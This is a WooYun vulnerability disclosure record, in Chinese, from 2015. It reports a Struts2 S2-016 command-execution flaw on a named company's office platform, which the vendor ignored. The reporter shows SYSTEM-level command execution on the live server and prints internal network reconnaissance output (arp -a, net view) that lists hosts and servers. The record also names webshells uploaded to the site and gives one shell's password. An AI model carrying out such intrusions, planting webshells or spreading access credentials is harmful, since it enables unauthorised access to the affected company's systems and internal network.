乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经主动忽略漏洞,细节向公众公开
命令执行可威胁内网
HOP-皇明信息化办公平台-HIMIN OFFICE PLATFORM目标地址:http://info.himin.com
Target: http://info.himin.com/messageAction!toSubSug.actionUseage: S2-016 Whoami: nt authority\systemWebPath: D:\Tomcat 8.0\webapps\ROOT\
可威胁内网
★K8cmd-> arp -a====================================================================================================================================??: 192.168.3.138 --- 0x11 Internet ?? ???? ?? 192.168.3.129 00-00-5e-00-01-07 ?? 192.168.3.131 00-50-56-be-56-a3 ?? 192.168.3.152 00-50-56-be-25-46 ?? 192.168.3.153 00-50-56-be-57-41 ?? 192.168.3.158 00-50-56-be-43-ea ?? 192.168.3.159 00-50-56-be-05-b3 ?? 192.168.3.172 00-50-56-be-1e-02 ?? 192.168.3.173 00-50-56-be-2a-8e ?? 192.168.3.178 00-21-85-c7-dc-00 ?? 192.168.3.180 5c-f3-fc-dd-1a-94 ?? 192.168.3.181 00-50-56-be-1b-57 ?? 192.168.3.182 00-21-5e-36-16-98 ?? 192.168.3.183 00-50-56-be-12-47 ?? 192.168.3.187 00-50-56-be-20-7f ?? 192.168.3.188 60-eb-69-d2-de-5c ?? 192.168.3.191 ff-ff-ff-ff-ff-ff ?? 224.0.0.22 01-00-5e-00-00-16 ?? 224.0.0.252 01-00-5e-00-00-fc ?? ★K8cmd-> net view====================================================================================================================================????? ??-------------------------------------------------------------------------------\\CGSERVER CGserver \\CTXLIC \\DEVELOPER \\HM-DNS1 \\HM-ECSCRM \\HM-ESCBC \\HM-EXAM \\HM-FTP \\HM-HMBC \\HM-HMCRM \\HM-HMGC \\HM-INFO \\HM-MEPAD \\HM-ORDER \\HM-QIHU \\HM-QINGBAO \\HM-RTX13 \\HM-SVN \\HM-U871A \\HM-U8V12 \\HM_CARD hm_card \\HM_WEBSITE \\HMSERVER \\HMSERVER0 \\HMSERVER2 \\HMSERVER3 \\HMSERVER5 \\HRSERVER \\HYDROGEN \\Q8415S4 NetDisk \\QTC-PC \\U8BAK NAS Management System \\UFNAS NAS Management System \\WIN-1ISJJA1KQ2T \\WIN-8II67SD3O58 \\WIN-SOU4L2DEP6C
上传小马:http://info.himin.com/one.jsp小马传大马:http://info.himin.com/wpp.jsp密码:pandas
多个数据库
涉及多个系统
st补丁
危害等级:无影响厂商忽略
忽略时间:2015-10-15 16:36
漏洞Rank:4 (WooYun评价)
暂无